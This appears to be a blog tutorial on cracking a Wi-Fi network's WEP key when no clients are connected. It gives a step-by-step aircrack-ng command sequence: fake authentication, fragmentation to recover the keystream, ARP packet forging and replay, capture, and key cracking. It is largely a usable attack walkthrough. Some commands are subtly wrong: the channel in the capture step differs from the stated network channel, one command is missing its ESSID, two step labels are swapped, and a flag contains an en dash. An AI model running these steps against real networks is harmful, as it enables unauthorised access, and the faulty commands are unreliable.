Before starting explaining how to crack WEP without clients, I assume you have a network card from this list, and the injections drivers installed (Kali is fully patched) if you have doubts check our tutorial – How to install Packet Injection Drivers on Linux!

After the drivers installed, we must test if everything is ok and if we are close enough to the Access Point (AP) to transmit packets to it! Follow these tutorial – How to test packets injection!

Read: What to do before attacking a Wifi Network


Create an image with Cisco packet tracer


  • 1 Access Point
  • 1 Laptop
  • 1 Alfa Card
  • 2 Neurons


All tools in this tutorial come from Aircrack-ng framework;

  • Airmon-ng
  • Airodump-ng
  • packetforge-ng
  • Aircrack-ng

Network Details

ESSID: WifiSec


Channel: 7

Monitor Interface: mon0

MAC Wifi card:

How it works?

            Cracking WEP is easy but we have to keep in mind what are our real world requirements and limitations we have to deal with. In this tutorial I will try to explain how to crack WEP without clients using fragmentation, fake authentication and ARP request replay attacks, for the curious i recommend read this two tutorials before – Conditions to crack a Wifi password, How WEP Works and WEP Attacks.

            Let’s start with the theory, first we must put our network card into monitor mode to sniff the packets from the air, then we must fake the authentication with AP to trying obtain the PRGA key when applying the fragmentation attack. With the PRGA key in hands we must create a ARP packet and inject it, then we start collecting our unique IV’s once all packets are collected we need to crack them to extract the password.


  • Proximity with AP
  • AP Filter clients MAC addresses
  • AP aren’t generating data packet’s
  • If Fails use Chopchop Attack

or Interactive frame selection

Crack WEP without clients

Put the interface into monitor mode;

airmon-ng start wlan0 7

Fake authentication attack

aireplay-ng -1 0 -e -a 9C:97:26:D7:94:71 -h 00:C0:4C:6B:FF:76 mon0

Keep alive the connection to AP

aireplay-ng -1 6000 -o 1 -q 10 -e Wifisec -a 9C:97:26:D7:94:71 -h 00:C0:4C:6B:FF:76 mon0

Create the Packet with the PRGA key

aireplay-ng -5 -b 9C:97:26:D7:94:71 -h 00:C0:4C:6B:FF:76 mon0

Inject the packet with PGRA key

packetforge-ng -0 -a 9C:97:26:D7:94:71 -h 00:C0:4C:6B:FF:76 -k -l -y *.xor -w arp-request

Start capture the data and send to a file

airodump-ng -c 9 –bssid 9C:97:26:D7:94:71 -w capturedata mon0

aireplay-ng -2 -r arp-request mon0

aircrack-ng -b 9C:97:26:D7:94:71  capture*.cap

1 thought on “WEP – How to crack WEP without clients

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes:

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>